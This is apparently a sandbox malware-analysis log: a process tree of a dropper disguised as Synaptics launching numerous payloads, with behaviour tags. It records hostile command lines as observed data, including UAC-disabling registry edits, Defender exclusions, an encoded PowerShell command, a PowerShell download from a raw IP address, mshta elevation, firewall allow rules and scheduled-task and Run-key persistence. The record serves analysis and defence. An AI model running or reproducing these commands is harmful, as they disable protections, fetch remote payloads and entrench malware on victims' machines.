    PID:6860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAZwBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcAB5ACMAPgA="
      4⤵
      PID:7284
  - - C:\Windows\Client.exe
      "C:\Windows\Client.exe"
      4⤵
      PID:5980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"' & exit
        5⤵
        
        PID:6340
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFB43.tmp.bat""
        5⤵
        
        PID:7772
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:1532
      - C:\WIndows\svchost.exe
        
        "C:\WIndows\svchost.exe"
        6⤵
        
        PID:6924
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2848
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C62E.tmp\C62F.tmp\C630.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
        5⤵
        
        PID:3228
      - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        6⤵
        Access Token Manipulation: Create Process with Token
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
        7⤵
        
        PID:4988
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCE5.tmp\CCE6.tmp\CCE7.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
        8⤵
        
        PID:1140
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        9⤵
        
        PID:248
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        9⤵
        
        PID:4228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        9⤵
        
        PID:8
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        9⤵
        
        PID:3312
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        10⤵
        
        PID:3344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        9⤵
        
        PID:4840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffc84a3f208,0x7ffc84a3f214,0x7ffc84a3f220
        10⤵
        
        PID:1288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1712,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:11
        10⤵
        
        PID:5736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2092,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:2
        10⤵
        
        PID:1440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2252,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:13
        10⤵
        
        PID:4600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=3460 /prefetch:1
        10⤵
        
        PID:4332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3448,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
        10⤵
        
        PID:4900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4880,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=4872 /prefetch:1
        10⤵
        
        PID:5336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4952,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:1
        10⤵
        
        PID:2032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5152,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:14
        10⤵
        
        PID:4004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5244,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:14
        10⤵
        
        PID:3452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5656,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:14
        10⤵
        
        PID:6064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:14
        10⤵
        
        PID:5880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1136
        11⤵
        
        PID:3744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6116,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:14
        10⤵
        
        PID:4204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6116,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:14
        10⤵
        
        PID:2980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6436,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:14
        10⤵
        
        PID:7112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6576,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:14
        10⤵
        
        PID:6452
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6572,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6688 /prefetch:14
        10⤵
        
        PID:6552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5444,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:14
        10⤵
        
        PID:2816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6444,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:1
        10⤵
        
        PID:8032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6852,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6860 /prefetch:1
        10⤵
        
        PID:3408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5980,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6880 /prefetch:1
        10⤵
        
        PID:7636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6392,i,6777116779321073305,5037520033870422387,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:10
        10⤵
        
        PID:7744
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\Files\PowerShell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3496
  - - C:\Users\Admin\AppData\Local\Temp\Files\kms_activator.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\kms_activator.exe"
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      4⤵
      PID:5176
  - - C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe"
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
        5⤵
        Views/modifies file attributes
        
        PID:7272
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
        5⤵
        Views/modifies file attributes
        
        PID:7992
  - - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
      4⤵
      PID:6492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7184
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7820
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\Files\Vikings.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Vikings.exe"
      4⤵
      PID:6576
    - - C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Yota'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6640
    - - C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6972
    - - C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7596
    - - C:\Yota\multiyota.exe
        
        "C:\Yota\multiyota.exe"
        5⤵
        
        PID:2640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 780
        6⤵
        Program crash
        
        PID:6780
  - - C:\Users\Admin\AppData\Local\Temp\Files\cheet.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\cheet.exe"
      4⤵
      PID:6760
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        5⤵
        
        PID:7000
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 1088
        5⤵
        Program crash
        
        PID:7088
  - - C:\Users\Admin\AppData\Local\Temp\Files\VsGraphicsResources.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\VsGraphicsResources.exe"
      4⤵
      PID:6184
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Proces hosta dla zadań systemu Windows" /sc ONLOGON /tr "C:\Windows\system32\3880\vsjitdebuggerui.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8116
    - - C:\Windows\system32\3880\vsjitdebuggerui.exe
        
        "C:\Windows\system32\3880\vsjitdebuggerui.exe"
        5⤵
        
        PID:6800
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Proces hosta dla zadań systemu Windows" /sc ONLOGON /tr "C:\Windows\system32\3880\vsjitdebuggerui.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7292
  - - C:\Users\Admin\AppData\Local\Temp\Files\crypted.54.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\crypted.54.exe"
      4⤵
      PID:7196
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\Files\example_win32_dx11.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\example_win32_dx11.exe"
      4⤵
      PID:5356
    - - C:\Users\Admin\AppData\Roaming\Steam\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"
        5⤵
        
        PID:6764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JfgSV95DhXMq.bat" "
        6⤵
        
        PID:6468
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2344
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3172
        
        C:\Users\Admin\AppData\Roaming\Steam\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"
        7⤵
        
        PID:3396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NlHhrMWBmrSP.bat" "
        8⤵
        
        PID:8048
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2132
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6228
        
        C:\Users\Admin\AppData\Roaming\Steam\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"
        9⤵
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyFsOvsernSs.bat" "
        10⤵
        
        PID:3120
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:8624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1252
        
        C:\Users\Admin\AppData\Roaming\Steam\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"
        11⤵
        
        PID:1124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SE19EQcjebxe.bat" "
        12⤵
        
        PID:7504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:7488
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8248
        
        C:\Users\Admin\AppData\Roaming\Steam\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\svchost.exe"
        13⤵
        
        PID:4400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tZeLb1gYc9lM.bat" "
        14⤵
        
        PID:6208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:864
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\Files\jet.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"
      4⤵
      PID:3496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
        5⤵
        
        PID:7864
  - - C:\Users\Admin\AppData\Local\Temp\Files\Explerer.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Explerer.exe"
      4⤵
      PID:7156
    - - C:\Users\Admin\AppData\Roaming\Explerer.exe
        
        "C:\Users\Admin\AppData\Roaming\Explerer.exe"
        5⤵
        
        PID:7364
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Explerer.exe" "Explerer.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6608
  - - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
      4⤵
      PID:7740
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2980
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:6636
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2932
  - - C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"
      4⤵
      PID:6216
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6616
    - - C:\Users\Admin\AppData\Roaming\svhost\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"
        5⤵
        
        PID:6592
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8
  - - C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\evetbeta.exe"
      4⤵
      PID:652
  - - C:\Users\Admin\AppData\Local\Temp\Files\ljgksdtihd.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ljgksdtihd.exe"
      4⤵
      PID:8092
    - - C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'ljgksdtihd' -Value '"C:\Users\Admin\AppData\Roaming\ljgksdtihd.exe"' -PropertyType 'String'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6228
  - - C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
      4⤵
      PID:9212
